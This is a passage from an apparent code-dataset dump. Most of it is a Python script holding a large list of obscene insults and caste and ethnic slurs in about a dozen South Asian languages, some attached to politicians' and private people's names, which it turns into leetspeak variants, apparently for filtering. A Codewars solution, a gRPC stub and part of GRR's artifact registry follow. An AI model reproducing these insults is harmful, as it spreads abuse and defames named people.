Bhikaar Chot
Bhosada
Bin gotyaachya
Bulli chokya
Chhaiyla
Chhinal
Chinaal maichya
chinal
chut marichya
Chut Marichya
fodri pisaat
Fodricchya
fokanchidy
Foknicha
Gand khaya
Gand phatli bhenchod
Gandit Ghuslo
Gandoo
Gav Zawadi
Hepari
Jhavadya
Kanadal
khargatya gandicha
Khullya lavdyacchya
lal gandya
Laudu
Lavadya
Lingapisat
madarchod
madarchoth
marathi
Muttha
Paadar Gandichya
pachi bota bhundyat
phodarphatya
Phodree Pisat
Pucchi Khajvya
puchi
Raandichya
Randechya
Shanya lavdyacchya
shata ki chutney
shattya
Shebnya
Telkat Randi
tondaat gay
tujha aila kutryawani zawin
tuji ai mutli madkyat phala-phala
Tuji aiee chi gaand
Tujya aaicha puchha
tuza baap dhandewala
tuzi aai padli madkyat
tuzi aai padli tuzya tondat
tuzua aaichi pucchi viskatli 40 ekrat
Tuzya aai chi Phodree
tuzya aaicha foda
tuzya aaicha lavda
tuzya aaichi gand
tuzya aaichi pucchi
tuzya aaichya gandit mungya
tuzya aaichya pucchila chavla kutra
tuzya aaichya pucchila chavla sap
tuzya aaila zavla kala kutra
Tuzya aii zavneya tuzya baapla
Tuzya bapacha pay adakla sandasat.
Tuzya gaandit paay
Yadzava
yadzavya
Yeda lavdya
zavadya
Zavkhor
zavnya
Adarsha
Bandar Ko Chaak
beshya
Bhalu
bhalu ko poi
Bhalu lai chik muji
chaak ko pwal
chahk
chahk ko dulka
chak cha
Chaman
Chick-day
Chickne
condo
condo hannay
Dhoti
dudh
fushi kha
Gadha
gand faat cha
Geda
Gidi Haps
goo kha
Goo kha
goo khai-ra morr
Gula chus randi
gula kha
Jantha
Kando
Kangres
Kukkur
kukur chikni
laando kha
lado
Lado
Lado chus
lado cocha
Lado kha
Lado ko tuppo
lamto
Lang Lang
ma shaala
maa chikney!
Maa chikni
Maa Rondi!
Machikne
Madhesi
mandale
maobadi
mero fushi kha
moot
mootday
moreko
moreko manchi
Morr Sali Morr!
morryo
Mugi
Muji
murda
muzy
pahadi
pinko
Prachanda
Puti Chat Chu
puti kha
puti ko jhol
Putin Chaat
radi ko puti
Randi ko baan
Randi ko Ban
randi ko choro
randiko choro
sungghur
turi tauke
Tutturay
ABHADRA
Baanda
Bada bou ghia
banda
Banda
banda chhod
Banda mundi
BARBARA
Batakara (pela)
bedha bia
Bedha toka
Bedha Toke
bedhei
Bedhei pua
bhauni giha
bia fata mada
bia ku darkar jaghanya gihan
Biaa
Bija
Biya chudi
Bujula
chodipua
chukiba
dana
Faizan
fusa chata
fusa kura
Gaandiaa
gandi
Gandi gia
Gandi Mara Sankara
Gandire Banda
Gayee de
gehiba
Ghoda Gehin Pua
Ghoda Ghein Bedha Toke
Ghusuri ghiaa
Goola gandha
gosti gian
Guola
Hagura magia
Han ta nalire goithe
hinjada
hinjida
Laathi biya re kaathi
Maa bia ra pua
Maa ghia
Maa gia
maagya
madarchaut
Mankada ghiya
mankada giha
mo priya ra bia re lagichi nia!!!!!
Mo Priya ra Gandi re Niya
Moro banda chaape
Mu tomo bhallo pauchu
Muuthi mara magia
naani bia re ghian
Nanna gia
PASANDA
Pela
Pela phata maada
pelei pua
Pelei pua
Pelei Puo
PUDI
randa (Pronounce Ra as robbery not as rabbit
Randa ku banda dhamakani
Randi puo
senti
Senti
Tate Gehibi
Thoola phata maada
To bhauni bia re ghia
To bou BIA
To Gandire Ghien
To Gandire Mo Banda
To Maa Bia re ghein
To Maa Biya Re Ghen
To maa ku gihe
to maa ku kukur gaheun
To Maipa Biaare gihen
To Maipa Biaare Gihen
To Maipa Gandi maribi
To Maipa Gandire gihen
bakvas
bhen chod
Choohi
Fudu
Haram Jaada
kalan
kudi chod
Kuri yani
kuri yawa
Kuthe Di Poosh
Kuthe Kambakhte
Laaaaauvre
Lan di Jhoon
lun tay charja
Lun te Waj
Momay
Pan chod
peyu di gand vich ungal
Phuddy
soor da lora
teri maa di fudi
Teri paan di chiter
Teri pan di lun
tutoo
Tutti
Bagul butcha
Bewakoof
Bhen da shola
Bhen Da Yaar
Bhenchod
Bhenchode
bhonsdu
Bibi di fudi
bokki
Bondu
bondu
bund
Bund
bund de
Bund Mara
Bund marr
chaval
Chitta Bander / Kalla Bander
Chitterchort
choos mera badaam
chutha
Chutiyaa
chuttiya
dallah
Dhila lan de padiash
Fooduu
fuddi hayon da
fudi
Fudi chut
Fudi da tataa
fudi fry karna
fudi hyounda
gand
gandu
Gandu
ganndu
Gashti
ghashti
haram da
harami saale
Haramjada
Jaa apne braah nu chod laa
kala lulla pi
kanjar
Kanjar
Kanjari
Kenjer
Khota
kissey kuti ma da puttar
Klatch
Kuta
kuta
Kutha
kuthay da puthar
Kuthi
kuti
Laan tare mow nee
lan chat
lan choos
Lauda
Lul
lula bahonder tup
lula chooshe
Lun
Lun choos
Lun Chung
Lun kurra how gaya
lun te charrh
Lund
Lund Chuss
Lunni
Ma chod
ma di podi
maa-jhouda
Maan Da Yaar
MaanChod
Mamai
Mamai Chuss
mamai patta
mango
mao ni puddi
matarchod
Mau ni yakk
Meh tera tueh vich aangliyan devan
Menu zor nal lan mar
Mera lan sakht ah
Mera lan tera tueh ki paarsi
Mera lun choos ta aangly mar
mera lund teri bund de betch
mere lund tey charr ke nach!
Meri Tutti Kha
Mume
Muth Maar
nuts ko suck kurrow
pad mar
Pan da yaar
Panchod salaa
Peshaab
phen chodtha
poo
Pud
Puddu
Pudhi avandeya
Pudi
randi
soor
Tatte
tatte chaude
tatte fad lo
tatte hayon da
taxi
Teri Bhen Dee Fuddi Mari
teri bhen di ghusi
teri bund ch lakad
Teri bund marni aa
teri fudi wich lul marya
Teri ma da ghusa
Teri ma di khali phudi
Teri ma the fudi
teri maa da fudda
teri maa da posrha
Teri maa dai ccholay
teri maa dee tutee swaad ya
Teri maa di gandi phuddi
Teri Maa Di Koosii Kay Uppar !
teri maa di pudi vich lath
teri maa nu lund
Teri Maan Dee Fuddi Mari
teri paan dee lund
Teri paan di fudi parrne
teri paen nu lan
Teri pain dha pahraya hoya phudda
teri pen da pudda
terri ma di fuid parne
topa
Topa
Topa te beja
Tu Bhen Da Yaar
Tu Maan Da Yaar
tu vich leni daa.
Tutta
Tuttay
Guddha naku
Guddha pagala dengutha
aathulu
aathulu peeku
aathulu peekutha
Aati Mokka
akka bokka lO naa sulla
akka nee pooku dengutha
amma pooku ki baanisa
amma pooku lo arati pandu
ATTHA POOKU DENGINA ALLDU
bochu
Bosudi
chilipiga thittatam
Chitthu Pooka
Dengithe dayyalu pudatai
Dengu
doola lanja
Gaadida Pichaloda
Gaja madda
golli cheeku ra kodaka
golli chekutha lanja
Gudda
gudda
gudda naaku
Hasta Prayogam chai
Jinniappa
kammani pooku
Kojja
Konamodda
kukka -pooka
kukka sulli
Kuthuru vongudu..alludu dhengudu
LANGA VIPPAVAE LANJAA
lanja
lanja - kodka
Lanja munda
lanja pooka
Lanjakodka
Marmangam
Modda
modda cheeku lanja
MODDA KUDUVU
modda naaku
modda notlo petti dengutha
modda, lavada, daddu, magatanam
muchchika, chanu mona
muddy lo velu petuko
naa modda gudu
Ne akka nu denga
ne akkan ma kukka dengha
Ne amma pukkulo naa modda
ne jathini kukka denga
ne notlo naa suli
Ne pookula na sulli
Nee aali pookulo Rampam
NEE AKKAANI DENGAA
nee akkanu denga
NEE ALINI DENGAA
nee amma guddani denga
nee amma kuttani denga
Nee amma roju na modda cheekuthundi
NEE AMMANI DENGAA
nee ammanu denga
nee ammanu dnegu
nee kooturu ni denga
nee notlo naa sulli
nee pallu super
nee pellaanni denga
nee pooku chekutha
nee pukulo naa sulli
Ni akkani pandulu denga
Ni pukla na madda
nihar
Nihar (or) banda pooku
ninnu dengutha
Nuvvu nee yendipoyina sulli
PEDDA SALLADHI
Pichi Pukoda
Pichi Pukudaana
Poi voungu ra
Pooku
pooku
pooku, dimma, pappa, bokka
Poooku chinchu
pukku naaku
Puku Peka adistha
puthhi
sachinoda
sallu dengutha
SANALO BOCHHO
shaata
Sravan (or) konda verri pooku
sulii
Sulli pattu
Teja (or) adivi pooku
Teja trivikram (or) adivi pooku
thurku valagodtha
Vattakai
vattalu
Vedhava
verri puka
vongo petti dengutha lanja
aaja choos mera lurs
Aap ka aana
apna lun cuti shur
Balal, mera noonoo na choop se
Behn ki chutar
Bhadwe Ki Nasal
bhai chode
Bhen chot
Bhen ke lorray
bosard chodi kay
Bund ke Biryani
chatt merai tattai
Choom meri Gaand
Choos Mera Lora
chooth kay pakoray
choti se luli
Chupa la lay
Chut ke chatney
dalla
dari moni pudi mari
deli mali guti
doe dolla raandee
Duffah oja
eik dolla raande
gaand chamchi
gaand ka bukhaar
Gaddha
ghandoo
Ghasti Kay Bachay
haraam salle
Haraamzada
Haraamzadi
haram salla
jhaant kay baal
kaala bandar
Kamina
kanjeri kay bachay
Khuss madri kay
kute liche ho chublo
kutee chode
kutta
Kuttay ka bacha
kutte ka ghanta
Kutti
kutti ka bacha
lalchi kutte kaa bacha
Lola/Lula
looly
lora le kay nach mera
Lula mu ki lan
lulmuah
Lun Chuse
Lund Pe Charh
Maan Chod
Maan kay laurday
madarugly
Mather chot
Mayyaada
meera loora choo so
meli mali guta
mera laan choop
monney podey
moomeh
muth ki malai
Myyaada
pancho
peasah nah mahr
Phudi
poody
Randee ka bacha
Randi ki nasal
rundi ka bacha
Shudra Lund
Tamil Lund
tari beh na puda paarsan
Tattay chooso
tattee choad
tere bhen meri chod hain
tere gand maroo
Teri Gaand Main Kutta Mutre
teri gand ma keera hai
teri gand mera lun hai
teri ma khuti
Teri Ma ki choot
Teri Ma Ko Kuttey Chodein
teri maa ki phudi
Toomaray tattay baraay pahraay heh
tu tho meri chod ki tara :P
Uloo Ki Pata
Uloo Ki Pati
ulu chod
abu gidir
Bazari
Bima khoigra
Bima khoygra
Bimani fishai
Bwitali
Cfa swlangra
Hinjao maogra (khoigra)
khilama
Khoynai
Lwdwi
Nwma shifa
Nwmani abu
Sifa gudung
Sifa jagra
sifa jagra
Sifa swlagra
Sikwmwn
maari tatoori ne chalay
Akbaruddin Owaisi
Alloo Bhosri Chaat
Anuj
Babhuchak
bai no bhosdo
bein chod
Benchod
Bhadvo
bhenchod
Bhoot
Bhopa
Bhos marina
Bhosad Pappu
bhosdo
bhosrini
bobla
Bobla Vagarni Baydi
Bosrichord
bosrina
Buckwass
Budhalal
chafu gaan
Chichi
Chod
Chod ami
Chodhru
chodkanya
Chodu
chupri lauri
Chutiya
Darshil
Dheela Lund Ni Olaad
Eapen
Fattu
gaan tari
Gaand Ghapli
Gaand Ma Ghal
gaandina, gandina
Gand nu kaanu
gandi chodina
gando
Gando salo
gel ghagharina
Ghel Chodyo
Ghelchoydi
Halki Raand na
Harsh Dalal
harshit
hopa
Huzefa
jaaro
Jhadhino!
Jignesh Mevani
karo loro
kem chho
kutari
Lakhota
Land
loda
lodde mari
Lowroh
luli
Lund Bhagat
Maa ne ghat bhosdina
maajaddha
maari tatoori ooper bess
maasi chodamno
Madachod
madachod
mandi susee
Manik
mara man no lado
mari bhosri chaat
meri gaan chatt
Mohit
Moht
mota jijah
nago choido
Nakhodiya
Namuno
Narender Modi
pikina
Pikina
pim pim
poom poom
Priyanshu
puchi chod
Puti
raand
rumana
sali
salu gut`ti
Sandas
suwwar jewu dachu
taari bai no aghano
Taari ma parasevo tya-reh e tuti kareh che!
Tara baap ni gaan
Taree gaar ma lowroh
Taree Ghaar Ma Doh Ladah
tari bosri kaapi karwa
tari dagri
tari gaand mare karya kutra balada
tari gandayli kari koyli dagri
Tari ma na bubla sukai-gya
tari ma ne hadi kadhto hathi chode
tari ma ni putti
tari ma no poplo
Tari maa na babla chusu
Tari maa na bhosda ma maro lodo
Tari maa na modha ma maro lodo
Tari maa ne chodu
Tari maa ni taturi
tari mai ni gand
tari mani choot ma derka bole
Taro baap tane chadeche
tere ma nu hinta kar
teree maah gaderi
thari ma ne bozro maro loro nakhides
Thari Ma Ni Ghaan
Tusat
Tutelli nirodh no aulad
Andoo
behenien khe yahan
Bhairain jo yaar
Bharain khe
Bharvo
Bhavesh
Bhen ja chud
Bherain khe
Budhi muhandro
Charyo
Chora
Chora / Chori
Chud
Chud Budhi jo
Chud muhandro
chutia
Chutoon
Dallo
gui jo tung
Guii / Gaand
Jadija
kakus
Kutey ja putta
lalli
Lun choop
Lun khao
Lun muhandro
Maa ja chud
maa ji teeta
Madar chot
Marhain jo yaar
Marhain khe
Marhen khe yahan
Mujhko aapka bur chahiye
neech
Pelo / Pela
Pelorray
Pirhain ji yaar
Pirhain ji yaar (adding "Jo" will make the Paramour masculine)
Pirhain khe
ran yadho
Ranayadha
Randi jo putr
Sagro muo
Teetay main
punda/pundai
poolu
ommapunda
thevdiyapaiya
okka/kokka
ommala oka
pundai
sunni
mayir/mayiru
oombu
kena pundai
akkula thukki kami di
kuthi
anaathai kaluthai
arivu ketta koothi
avuthu kami
baadu
chunni
ennoda poola oombuda
okka kudi
kaai
kaai adithal
kala viridi
ki adi
koothi mayir
kuthi kolutha thevdia
kuthia virikira thevdia
molaikku naduvule uttu okka
molaikku naduvule utu olu da
okkala ozhi
ommala oka
ommala
onkka pundek
kunju
panni
pavadaiyathukkikamidi
pisasu
poolu
pooluarunthapundamavan
puluthi
puluthi punda
puluthinapoolaumbudi
pundamavale
pundavaaya
pundaamavane
pundainakki
pundainakki
pundayenakku
soothu
suththu
sunni
sunniyaoombu
suthaa
thaiyoli
thangathevdia
thevidiya pulla
thevidiya mavale
thotha pundai
thevadiyamavan
thevdiyakuthi
thoomiyakudiki
thevdiyakuthileuttapoolu
thevdiyapaiya
thoronthukamidi
thukkikami
ungaaayakuthi
vaaila vaangu
vesi
viruchu kaami
arippueduthakuthimavale
auvusaarikoodi
gajakkol
kalaiviridi
kandaaraoli
karungkuthimavale
keeshanappa
kenapunda
koodhi
koodhipayale
koothinuckie
kudiyabaadu
kundi
kundimudi
kunjipayalae
kusukoodhi
kuthimudiyathadavikamidi
loosukoodhi
mairupudungi
malamattupunda
mayirupoodunghi
molasappi
mollamaari
monnanaaye
mairaandi
muttaakoodhi
naarakoodhi
pudungi
nayeesoothileunkunji
oakkauttabaadu
okkalaoli
olithebengali
olmaari
oluthapundai
ongappanpundai
oogili
oombu
oora otha thevidiya
oorthevidya
oka
oththa
oolu
kuthi
paepunda
kenakuthi
potta punda
parapundamaune
padukka pottu okka
parathesi punda
patchathevidiya
pochu pundai
pochchu
poolpayya
poolu
thevudiya
avusaari
pullusappi
puluthi
pundamavanae
pula chappu
pula umbu
oththa punda
sakkiliakoodhi
sappi
selayaithukkudi
vaaila vachuruven
sunniya umbu
pundaiya moodu
mola
molai
thevdiya
thevidiya
thevidiyapundai
molaya amukava
naara punda
okkala okka
vailevatchuko
ommala pottu okka
monna pundai
kai mutti
para punda
ommala okka
kai adiki
munda kalappa
otha
vaaila vaangu
arivu ketta mundam
Baah Khuwa
Baal
baal kela
baal khuruwa
baaperor konitu
baaperor pukorkhon
Bal
Bandor Chod
Bari
Bengena Mora
billa suda
bimakho khoigra
boinaak sudaai
boiner lalak
boithali
buch seleka
Bush
Bush mara
Bushot tel diya
Chet
ekka she duuka
fifa ni lodoi
Fuck Dang Fo!
gar mora
Gida
Gida Khua
Gu
Gu Khuwa
guu kha
guu kha mokkel
Jairir badcha
Jhaant singa
johoni jua
Johora
Jonghol
Kela
Keti
Koti Mara
Kotit bari homai dim
Kukur'or puwali
laura
Lauri ke bal
Lothou Guti
Ludoi
Maaeror Boos, maksudai
Maaeror fof khon
maak sudai
Maaror bhumikhon kela
maka dingding
maka linglang
Maksaai
mangmarani
Meeyarek Kohai
Mumu
Nagori putek
Naliya
Pel suha
Pheda cheleka
Pokorot Kothal Bhoram
pukor selek
raandii
Randir soli
Rendi Dallal
Rendir Beta
Rendy Suda
Set Suda
setor baal
sipha jagra
Sudasudi
Sudi Gida Falidim
Sudur Bhai
sut marani
syetor moila
Tez piya
Tumak sudibor mon goise
tur maak sudu
Tur Maak Sudu
Tur maraok rastat kukur logi sudam..
"""
words = s.split('\n')
for word in words:
print(word)
lst.append(Leet2Combos(word))
k = pd.DataFrame(lst)
k.to_csv("leet Lol.csv")
k.head()
del k
print(word)
clear_output(wait=True)
i+=1
print(i)
| 13.117534
| 87
| 0.812241
|
0152fc835f369302f2e9e9902f7a71cec72cc7bc
| 329
|
py
|
Python
|
Codewars_Python/CodeGolf/jaden_casing_strings_7_kyu.py
|
nlantau/Codewars_2020_2021
|
055fbf8785ddd52b9f8e8c2b59294ead01852467
|
[
"MIT"
] | null | null | null |
Codewars_Python/CodeGolf/jaden_casing_strings_7_kyu.py
|
nlantau/Codewars_2020_2021
|
055fbf8785ddd52b9f8e8c2b59294ead01852467
|
[
"MIT"
] | null | null | null |
Codewars_Python/CodeGolf/jaden_casing_strings_7_kyu.py
|
nlantau/Codewars_2020_2021
|
055fbf8785ddd52b9f8e8c2b59294ead01852467
|
[
"MIT"
] | null | null | null |
# nlantau, 2021-10-10
"""
quote = "How can mirrors be real if our eyes aren't real"
test.assert_equals(to_jaden_case(quote), "How Can Mirrors Be Real If Our Eyes Aren't Real")
"""
a="How can mirrors be real if our eyes aren't real"
to_jaden_case=lambda a:' '.join(w[0].upper()+w[1:] for w in a.split())
print(to_jaden_case(a))
| 29.909091
| 91
| 0.702128
|
1c098f9b0b0dec57051b70f799973534a33efdc5
| 2,414
|
py
|
Python
|
nlp/zemberek/preprocess_pb2_grpc.py
|
fatihint/lugatrap
|
868bd34517eb325591eba96af8176bc4ad5b0fb6
|
[
"Apache-2.0"
] | 1
|
2021-04-15T16:16:10.000Z
|
2021-04-15T16:16:10.000Z
|
nlp/zemberek/preprocess_pb2_grpc.py
|
fatihint/lugatrap
|
868bd34517eb325591eba96af8176bc4ad5b0fb6
|
[
"Apache-2.0"
] | 1
|
2021-11-04T18:48:01.000Z
|
2021-11-04T18:48:01.000Z
|
nlp/zemberek/preprocess_pb2_grpc.py
|
fatihint/lugatrap
|
868bd34517eb325591eba96af8176bc4ad5b0fb6
|
[
"Apache-2.0"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from . import preprocess_pb2 as preprocess__pb2
class PreprocessingServiceStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Tokenize = channel.unary_unary(
'/zemberek.preprocessor.PreprocessingService/Tokenize',
request_serializer=preprocess__pb2.TokenizationRequest.SerializeToString,
response_deserializer=preprocess__pb2.TokenizationResponse.FromString,
)
self.ExtractSentences = channel.unary_unary(
'/zemberek.preprocessor.PreprocessingService/ExtractSentences',
request_serializer=preprocess__pb2.SentenceExtractionRequest.SerializeToString,
response_deserializer=preprocess__pb2.SentenceExtractionResponse.FromString,
)
class PreprocessingServiceServicer(object):
# missing associated documentation comment in .proto file
pass
def Tokenize(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ExtractSentences(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_PreprocessingServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Tokenize': grpc.unary_unary_rpc_method_handler(
servicer.Tokenize,
request_deserializer=preprocess__pb2.TokenizationRequest.FromString,
response_serializer=preprocess__pb2.TokenizationResponse.SerializeToString,
),
'ExtractSentences': grpc.unary_unary_rpc_method_handler(
servicer.ExtractSentences,
request_deserializer=preprocess__pb2.SentenceExtractionRequest.FromString,
response_serializer=preprocess__pb2.SentenceExtractionResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'zemberek.preprocessor.PreprocessingService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 37.71875
| 91
| 0.769677
|
b12013c44a913bdefba7c7fd2ec22726a76fac2b
| 24,741
|
py
|
Python
|
grr/server/grr_response_server/artifact_registry.py
|
BA7JCM/grr
|
c6f3b19e73e1d76a195d3c9a63e894ace6ea2508
|
[
"Apache-2.0"
] | null | null | null |
grr/server/grr_response_server/artifact_registry.py
|
BA7JCM/grr
|
c6f3b19e73e1d76a195d3c9a63e894ace6ea2508
|
[
"Apache-2.0"
] | null | null | null |
grr/server/grr_response_server/artifact_registry.py
|
BA7JCM/grr
|
c6f3b19e73e1d76a195d3c9a63e894ace6ea2508
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""Central registry for artifacts."""
import io
import logging
import os
import threading
from grr_response_core import config
from grr_response_core.lib import artifact_utils
from grr_response_core.lib import objectfilter
from grr_response_core.lib import parsers
from grr_response_core.lib import type_info
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import artifacts as rdf_artifacts
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.util.compat import yaml
from grr_response_server import data_store
# Names of fields that should no longer be used but might occur in old artifact
# files.
DEPRECATED_ARTIFACT_FIELDS = frozenset([
"labels",
])
class ArtifactRegistrySources(object):
"""Represents sources of the artifact registry used for getting artifacts."""
def __init__(self):
self._dirs = set()
self._files = set()
def AddDir(self, dirpath):
"""Adds a directory path as a source.
Args:
dirpath: a string representing a path to the directory.
Returns:
True if the directory is not an already existing source.
"""
if dirpath not in self._dirs:
self._dirs.add(dirpath)
return True
return False
def AddFile(self, filepath):
"""Adds a file path as a source.
Args:
filepath: a string representing a path to the file.
Returns:
True if the file is not an already existing source.
"""
if filepath not in self._files:
self._files.add(filepath)
return True
return False
def Clear(self):
self._dirs.clear()
self._files.clear()
def GetDirs(self):
"""Returns an iterator over defined source directory paths."""
return iter(self._dirs)
def GetFiles(self):
"""Returns an iterator over defined source file paths."""
return iter(self._files)
def GetAllFiles(self):
"""Yields all defined source file paths.
This includes file paths defined directly and those defined implicitly by
defining a directory.
"""
for filepath in self._files:
yield filepath
for dirpath in self._dirs:
for filepath in ArtifactRegistrySources._GetDirYamlFiles(dirpath):
if filepath in self._files:
continue
yield filepath
@staticmethod
def _GetDirYamlFiles(dirpath):
try:
for filename in os.listdir(dirpath):
if filename.endswith(".json") or filename.endswith(".yaml"):
yield os.path.join(dirpath, filename)
except (IOError, OSError) as error:
logging.warning("problem with accessing artifact directory '%s': %s",
dirpath, error)
class ArtifactRegistry(object):
"""A global registry of artifacts."""
def __init__(self):
self._artifacts = {}
self._sources = ArtifactRegistrySources()
self._dirty = False
# Field required by the utils.Synchronized annotation.
self.lock = threading.RLock()
def _LoadArtifactsFromDatastore(self):
"""Load artifacts from the data store."""
loaded_artifacts = []
# TODO(hanuszczak): Why do we have to remove anything? If some artifact
# tries to shadow system artifact shouldn't we just ignore them and perhaps
# issue some warning instead? The datastore being loaded should be read-only
# during upload.
# A collection of artifacts that shadow system artifacts and need
# to be deleted from the data store.
to_delete = []
artifact_list = data_store.REL_DB.ReadAllArtifacts()
for artifact_value in artifact_list:
try:
self.RegisterArtifact(
artifact_value, source="datastore:", overwrite_if_exists=True)
loaded_artifacts.append(artifact_value)
except rdf_artifacts.ArtifactDefinitionError as e:
# TODO(hanuszczak): String matching on exception message is rarely
# a good idea. Instead this should be refectored to some exception
# class and then handled separately.
if "system artifact" in str(e):
to_delete.append(artifact_value.name)
else:
raise
if to_delete:
DeleteArtifactsFromDatastore(to_delete, reload_artifacts=False)
self._dirty = True
# TODO(hanuszczak): This is connected to the previous TODO comment. Why
# do we throw exception at this point? Why do we delete something and then
# abort the whole upload procedure by throwing an exception?
detail = "system artifacts were shadowed and had to be deleted"
raise rdf_artifacts.ArtifactDefinitionError(to_delete, detail)
# Once all artifacts are loaded we can validate.
revalidate = True
while revalidate:
revalidate = False
for artifact_obj in loaded_artifacts[:]:
try:
Validate(artifact_obj)
except rdf_artifacts.ArtifactDefinitionError as e:
logging.error("Artifact %s did not validate: %s", artifact_obj.name,
e)
artifact_obj.error_message = str(e)
loaded_artifacts.remove(artifact_obj)
revalidate = True
# TODO(hanuszczak): This method should be a stand-alone function as it doesn't
# use the `self` parameter at all.
@utils.Synchronized
def ArtifactsFromYaml(self, yaml_content):
"""Get a list of Artifacts from yaml."""
raw_list = yaml.ParseMany(yaml_content)
# TODO(hanuszczak): I am very sceptical about that "doing the right thing"
# below. What are the real use cases?
# Try to do the right thing with json/yaml formatted as a list.
if (isinstance(raw_list, list) and len(raw_list) == 1 and
isinstance(raw_list[0], list)):
raw_list = raw_list[0]
# Convert json into artifact and validate.
valid_artifacts = []
for artifact_dict in raw_list:
# Old artifacts might still use deprecated fields, so we have to ignore
# such. Here, we simply delete keys from the dictionary as otherwise the
# RDF value constructor would raise on unknown fields.
for field in DEPRECATED_ARTIFACT_FIELDS:
artifact_dict.pop(field, None)
# In this case we are feeding parameters directly from potentially
# untrusted yaml/json to our RDFValue class. However, safe_load ensures
# these are all primitive types as long as there is no other
# deserialization involved, and we are passing these into protobuf
# primitive types.
try:
artifact_value = rdf_artifacts.Artifact(**artifact_dict)
valid_artifacts.append(artifact_value)
except (TypeError, AttributeError, type_info.TypeValueError) as e:
name = artifact_dict.get("name")
raise rdf_artifacts.ArtifactDefinitionError(
name, "invalid definition", cause=e)
return valid_artifacts
def _LoadArtifactsFromFiles(self, file_paths, overwrite_if_exists=True):
"""Load artifacts from file paths as json or yaml."""
loaded_files = []
loaded_artifacts = []
for file_path in file_paths:
try:
with io.open(file_path, mode="r", encoding="utf-8") as fh:
logging.debug("Loading artifacts from %s", file_path)
for artifact_val in self.ArtifactsFromYaml(fh.read()):
self.RegisterArtifact(
artifact_val,
source="file:%s" % file_path,
overwrite_if_exists=overwrite_if_exists)
loaded_artifacts.append(artifact_val)
logging.debug("Loaded artifact %s from %s", artifact_val.name,
file_path)
loaded_files.append(file_path)
except (IOError, OSError) as e:
logging.error("Failed to open artifact file %s. %s", file_path, e)
except rdf_artifacts.ArtifactDefinitionError as e:
logging.error("Invalid artifact found in file %s with error: %s",
file_path, e)
raise
# Once all artifacts are loaded we can validate.
for artifact_value in loaded_artifacts:
Validate(artifact_value)
@utils.Synchronized
def ClearSources(self):
self._sources.Clear()
self._dirty = True
@utils.Synchronized
def AddFileSource(self, filename):
self._dirty |= self._sources.AddFile(filename)
@utils.Synchronized
def AddDirSource(self, dirname):
self._dirty |= self._sources.AddDir(dirname)
@utils.Synchronized
def AddDirSources(self, dirnames):
for dirname in dirnames:
self.AddDirSource(dirname)
@utils.Synchronized
def AddDefaultSources(self):
for path in config.CONFIG["Artifacts.artifact_dirs"]:
self.AddDirSource(path)
@utils.Synchronized
def RegisterArtifact(self,
artifact_rdfvalue,
source="datastore",
overwrite_if_exists=False,
overwrite_system_artifacts=False):
"""Registers a new artifact."""
artifact_name = artifact_rdfvalue.name
if artifact_name in self._artifacts:
if not overwrite_if_exists:
details = "artifact already exists and `overwrite_if_exists` is unset"
raise rdf_artifacts.ArtifactDefinitionError(artifact_name, details)
elif not overwrite_system_artifacts:
artifact_obj = self._artifacts[artifact_name]
if not artifact_obj.loaded_from.startswith("datastore:"):
# This artifact was not uploaded to the datastore but came from a
# file, refuse to overwrite.
details = "system artifact cannot be overwritten"
raise rdf_artifacts.ArtifactDefinitionError(artifact_name, details)
# Preserve where the artifact was loaded from to help debugging.
artifact_rdfvalue.loaded_from = source
# Clear any stale errors.
artifact_rdfvalue.error_message = None
self._artifacts[artifact_rdfvalue.name] = artifact_rdfvalue
@utils.Synchronized
def UnregisterArtifact(self, artifact_name):
try:
del self._artifacts[artifact_name]
except KeyError:
raise ValueError("Artifact %s unknown." % artifact_name)
@utils.Synchronized
def ClearRegistry(self):
self._artifacts = {}
self._dirty = True
def _ReloadArtifacts(self):
"""Load artifacts from all sources."""
self._artifacts = {}
self._LoadArtifactsFromFiles(self._sources.GetAllFiles())
self.ReloadDatastoreArtifacts()
def _UnregisterDatastoreArtifacts(self):
"""Remove artifacts that came from the datastore."""
to_remove = []
for name, artifact in self._artifacts.items():
if artifact.loaded_from.startswith("datastore"):
to_remove.append(name)
for key in to_remove:
self._artifacts.pop(key)
@utils.Synchronized
def ReloadDatastoreArtifacts(self):
# Make sure artifacts deleted by the UI don't reappear.
self._UnregisterDatastoreArtifacts()
self._LoadArtifactsFromDatastore()
def _CheckDirty(self, reload_datastore_artifacts=False):
if self._dirty:
self._dirty = False
self._ReloadArtifacts()
else:
if reload_datastore_artifacts:
self.ReloadDatastoreArtifacts()
@utils.Synchronized
def GetArtifacts(self,
os_name=None,
name_list=None,
source_type=None,
exclude_dependents=False,
provides=None,
reload_datastore_artifacts=False):
"""Retrieve artifact classes with optional filtering.
All filters must match for the artifact to be returned.
Args:
os_name: string to match against supported_os
name_list: list of strings to match against artifact names
source_type: rdf_artifacts.ArtifactSource.SourceType to match against
source_type
exclude_dependents: if true only artifacts with no dependencies will be
returned
provides: return the artifacts that provide these dependencies
reload_datastore_artifacts: If true, the data store sources are queried
for new artifacts.
Returns:
list of artifacts matching filter criteria
"""
self._CheckDirty(reload_datastore_artifacts=reload_datastore_artifacts)
results = {}
for artifact in self._artifacts.values():
# artifact.supported_os = [] matches all OSes
if os_name and artifact.supported_os and (
os_name not in artifact.supported_os):
continue
if name_list and artifact.name not in name_list:
continue
if source_type:
source_types = [c.type for c in artifact.sources]
if source_type not in source_types:
continue
if exclude_dependents and GetArtifactPathDependencies(artifact):
continue
if not provides:
results[artifact.name] = artifact
else:
# This needs to remain the last test, if it matches the result is added
for provide_string in artifact.provides:
if provide_string in provides:
results[artifact.name] = artifact
break
return list(results.values())
@utils.Synchronized
def GetRegisteredArtifactNames(self):
return [str(x) for x in self._artifacts]
@utils.Synchronized
